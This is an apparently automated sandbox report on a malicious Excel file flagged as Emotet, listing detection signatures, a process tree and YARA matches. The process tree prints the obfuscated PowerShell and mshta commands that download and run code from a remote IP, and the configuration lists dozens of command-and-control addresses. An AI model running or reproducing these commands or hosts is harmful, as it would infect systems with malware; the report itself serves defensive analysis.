Edit tour

Windows Analysis Report
80_513972285.xls

Overview

General Information

Sample Name:	80_513972285.xls
Analysis ID:	562424
MD5:	c130bfd7e7632f18fcd505d0991f192f
SHA1:	da0d0031d5f6386f0df623a3c1cabfe4e9778f51
SHA256:	eaad4c93a96bb50a79e024650ae4808afd7fddbd604cbc4048416ddcb20e6aae
Tags:	SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Multi AV Scanner detection for domain / URL

Sigma detected: Windows Shell File Write to Suspicious Folder

Document contains OLE streams with names of living off the land binaries

Powershell drops PE file

Sigma detected: MSHTA Spawning Windows Shell

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Sigma detected: Suspicious MSHTA Process Patterns

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious PowerShell Command Line

Found Excel 4.0 Macro with suspicious formulas

Machine Learning detection for dropped file

Sigma detected: Mshta Spawning Windows Shell

C2 URLs / IPs found in malware configuration

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Abnormal high CPU Usage

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Searches for the Microsoft Outlook file path

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to delete services

Creates a process in suspended mode (likely to inject code)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

PE file contains an invalid checksum

Yara detected Xls With Macro 4.0

Connects to several IPs in different countries

Potential key logger detected (key state polling based)

Creates a window with clipboard capturing capabilities

Document contains embedded VBA macros

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2648 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

cmd.exe (PID: 2824 cmdline: cmd /c mshta http://91.240.118.168/qqw/aas/se.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

mshta.exe (PID: 2840 cmdline: mshta http://91.240.118.168/qqw/aas/se.html MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 3012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 2132 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

rundll32.exe (PID: 1836 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1904 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2328 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2180 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1328 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2932 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1524 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2544 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
80_513972285.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x108a2:$s1: Excel 0x11913:$s1: Excel 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
80_513972285.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security
80_513972285.xls	INDICATOR_OLE_Excel4Macros_DL2	Detects OLE Excel 4 Macros documents acting as downloaders	ditekSHen	0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00 0x946:$x1: * #,##0 0x952:$x1: * #,##0 0x9fb:$x1: * #,##0 0xa0a:$x1: * #,##0 0xa36:$x1: * #,##0

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\80_513972285.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x108a2:$s1: Excel 0x11913:$s1: Excel 0x481d:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\80_513972285.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security
C:\Users\user\Desktop\80_513972285.xls	INDICATOR_OLE_Excel4Macros_DL2	Detects OLE Excel 4 Macros documents acting as downloaders	ditekSHen	0x47a3:$e2: 00 4D 61 63 72 6F 31 85 00 0x481d:$a1: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A 00 0x946:$x1: * #,##0 0x952:$x1: * #,##0 0x9fb:$x1: * #,##0 0xa0a:$x1: * #,##0 0xa36:$x1: * #,##0
C:\ProgramData\QWER.dll	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 69 entries

Unpacked PEs

Source	Rule	Description	Author
17.2.rundll32.exe.330000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.28f0000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2890000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2810000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2280000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3060000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2340000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2130000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2860000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.190000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.3e0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2280000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2170000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.420000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.460000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2100000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2830000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.330000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.27a0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2e10000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.27a0000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.3150000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.610000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.23f0000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2e00000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2080000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.190000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2130000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.28a0000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.440000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.26d0000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.6c0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.31c0000.15.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.330000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.26b0000.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.190000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.380000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.630000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2840000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.3190000.14.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2870000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.430000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.28c0000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.180000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.1c0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2160000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.4f0000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2740000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.460000.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.27a0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2730000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.340000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.4f0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2860000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.2340000.8.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.26d0000.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.1a0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2950000.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.470000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2890000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2810000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3030000.12.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.300000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.23c0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.4f0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.200000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.380000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.200000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2dc0000.11.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.4f0000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.28f0000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2950000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2740000.8.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.23f0000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.3030000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.260000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
11.2.rundll32.exe.1a0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.4c0000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
17.2.rundll32.exe.3160000.13.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2e10000.12.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.660000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.2870000.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
10.2.rundll32.exe.2080000.2.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.190000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
15.2.rundll32.exe.2490000.5.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.rundll32.exe.630000.2.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
